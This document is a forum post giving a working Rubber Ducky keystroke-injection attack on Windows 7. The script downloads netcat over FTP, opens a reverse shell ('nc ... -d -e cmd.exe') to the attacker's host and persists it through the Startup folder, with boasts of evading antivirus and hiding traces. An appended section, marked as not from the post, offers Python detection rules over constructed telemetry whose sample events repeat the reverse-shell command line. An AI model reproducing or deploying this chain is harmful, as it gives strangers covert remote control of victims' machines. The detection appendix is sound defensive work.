D0oM Posted November 3, 2011 (edited)

My Strictly Netcat Reverse Shell

Ok, this has a few requirements so it is not that user friendly, but I like this method because after a few tests it has not been detected by any AV or other types of security programs. Works on Windows 7.

The first requirement is an FTP server. All Windows boxes include an FTP client by default; that's what I will be using to download the nc.exe and the startup script .bat file. If Windows had a wget program we would not even need an FTP server. An anonymous server with upload and download turned on would be great for this, but good luck finding one. So you will probably have to run an FTP server yourself like I have done.

So once you have an FTP server up and running, download the Windows version of netcat, unzip it and put the files into a directory called /tools/nc in the root directory of the user you're logging in with (you can always change my code so your ducky script will look in the specific directory you want it to for the nc files). Download the Windows version of netcat here: http://www.downloadnetcat.com/. Scroll down and select "download netcat windows version".

Now make a .bat file and add one line to it:

start nc yourserver.dyndns.org 8080 -d -e cmd.exe

Add that .bat file to the same directory your netcat files are in. In my case /tools/nc.

Now on your attacking computer you must listen for the incoming connection with this command:

nc -l -p 8080

Also remember to port forward port 8080 on your router to your internal listening attack computer!

Now that you have everything set up you are ready to put the ducky into a victim's computer anywhere in the world. The only thing that can stop this is if the victim's network for some reason blocks 8080 incoming or outgoing. In that case just change the port number. I've tested this on a few Windows 7 systems and it went undetected on all of them. Each one had anti-virus such as McAfee and Norton. Firewalls on as well.

ESCAPE
CONTROL ESCAPE
DELAY 900
STRING cmd
DELAY 900
MENU
DELAY 900
STRING a
DELAY 900
ENTER
DELAY 1800
LEFTARROW
DELAY 900
ENTER
DELAY 900
STRING ftp
ENTER
DELAY 600
STRING open yourftpservernamehere.dyndns.org
ENTER
DELAY 900
STRING FtpUsernameHere
ENTER
DELAY 900
STRING YourFtpServersUsernamesPasswdHere
DELAY 500
ENTER
DELAY 1000
STRING cd tools
ENTER
DELAY 900
STRING cd nc
DELAY 900
ENTER
STRING mget *
DELAY 800
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 500
ENTER
STRING quit
ENTER
DELAY 400
STRING start nc yourlisteningservernamehere.dyndns.org 8080 -d -e cmd.exe
ENTER
DELAY 400
STRING exit
ENTER

Now once you're inside the victim's computer issue the command:

move batfileyoumade.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Now their computer will run your netcat reverse shell whenever it boots.

You may have noticed I have some long delays. I have long delays because I tested on fast and SLOW computers which required the longer delays to work. You may also notice the "start" before the actual nc reverse shell command. This is the equivalent to the & in Linux to run a command in the background. Doing this enables us to exit out of the command prompt, leaving fewer traces of the backdoor. So the only way the victim will see the backdoor is if they check things like Task Manager.

Edited November 4, 2011 by D0oM
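Added example, not part of D0oM's post and not something the post's author ran: the post's claim is that this chain slipped past two AV products, so the natural follow-up for a defender is process and file telemetry rather than signatures. The Python below runs three rules over constructed Sysmon-style events written as JSON lines (EventID 1 = process create, EventID 11 = file create): ftp.exe launched from a shell (the download cradle), netcat started with -e or -c pointing at a shell (the reverse shell, generalised to ncat's -c as well as the -e in the post), and a runnable file appearing in a Startup folder (the persistence step), then correlates the last two per host. The host names, paths, PIDs and field names are assumptions made for the example, as is the premise that the sensor records the .bat landing in Startup as a file-create event; a same-volume `move` is a rename, so check what your own sensor emits for it.

```python
"""Detection rules for the netcat-over-FTP persistence chain described in the post.

Added example, not from the post. Events are constructed, Sysmon-style JSON
lines (EventID 1 = process create, EventID 11 = file create); the hosts,
paths, PIDs and field names are made up for illustration.
"""
import json
import ntpath

NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
STARTUP_MARKER = "\\start menu\\programs\\startup\\"   # matches all-users and per-user Startup
RUNNABLE = (".bat", ".cmd", ".exe", ".vbs", ".lnk", ".ps1")

# Constructed telemetry: WS01 runs the chain from the post, WS02 is benign noise.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Computer": "WS01", "ProcessId": 4412, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd"}
{"EventID": 1, "Computer": "WS01", "ProcessId": 4420, "Image": "C:\\Windows\\System32\\ftp.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "ftp"}
{"EventID": 1, "Computer": "WS01", "ProcessId": 4431, "Image": "C:\\Windows\\System32\\nc.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "nc attacker.example 8080 -d -e cmd.exe"}
{"EventID": 11, "Computer": "WS01", "ProcessId": 4412, "Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.bat"}
{"EventID": 1, "Computer": "WS02", "ProcessId": 2200, "Image": "C:\\Tools\\nc.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "nc -zv intranet.example 443"}
{"EventID": 11, "Computer": "WS02", "ProcessId": 2210, "Image": "C:\\Program Files\\OneDrive\\OneDrive.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\notes.txt"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _base(path):
    # ntpath understands backslash separators even when this runs on Linux
    return ntpath.basename(path).lower()


def is_netcat_reverse_shell(ev):
    """nc/ncat with -e or -c aimed at a shell: cmd.exe's stdio is handed to the socket."""
    if ev.get("EventID") != 1 or _base(ev.get("Image", "")) not in NETCAT_IMAGES:
        return False
    argv = ev.get("CommandLine", "").split()
    for i, tok in enumerate(argv[:-1]):
        if tok.lower() in ("-e", "-c") and _base(argv[i + 1]) in SHELLS:
            return True
    return False


def is_ftp_from_shell(ev):
    """Interactive ftp.exe spawned by a shell: the download cradle the post relies on."""
    return (ev.get("EventID") == 1
            and _base(ev.get("Image", "")) == "ftp.exe"
            and _base(ev.get("ParentImage", "")) in SHELLS)


def is_startup_folder_write(ev):
    """A runnable file appearing in a Startup folder. Assumes the sensor logs the
    arrival as a file-create; a same-volume move is a rename, so verify on your sensor."""
    if ev.get("EventID") != 11:
        return False
    target = ev.get("TargetFilename", "").lower()
    return STARTUP_MARKER in target and target.endswith(RUNNABLE)


RULES = (
    ("netcat_reverse_shell", is_netcat_reverse_shell, "CommandLine"),
    ("ftp_from_shell", is_ftp_from_shell, "CommandLine"),
    ("startup_folder_write", is_startup_folder_write, "TargetFilename"),
)


def detect(events):
    """Return per-event alerts in event order, then one composite alert per host
    that shows both the reverse shell and the Startup-folder drop."""
    alerts = []
    for ev in events:
        for name, pred, field in RULES:
            if pred(ev):
                alerts.append({"rule": name, "host": ev.get("Computer"),
                               "pid": ev.get("ProcessId"), "detail": ev.get(field)})
                break
    seen = {}
    for a in alerts:
        seen.setdefault(a["host"], set()).add(a["rule"])
    for host, rules in seen.items():
        if {"netcat_reverse_shell", "startup_folder_write"} <= rules:
            alerts.append({"rule": "reverse_shell_persistence", "host": host,
                           "pid": None, "detail": sorted(rules)})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{a['rule']:26} {a['host']:5} pid={a['pid']} {a['detail']}")
```

The -e rule works on whitespace-split tokens, so it catches the exact line from the post (`nc host 8080 -d -e cmd.exe`) and ncat's `-c`, but not bundled flags or a renamed binary; the `nc -zv` scan on WS02 and the OneDrive write produce nothing. The composite rule is what turns two loose hits into a persistence finding, which is the part worth paging someone for.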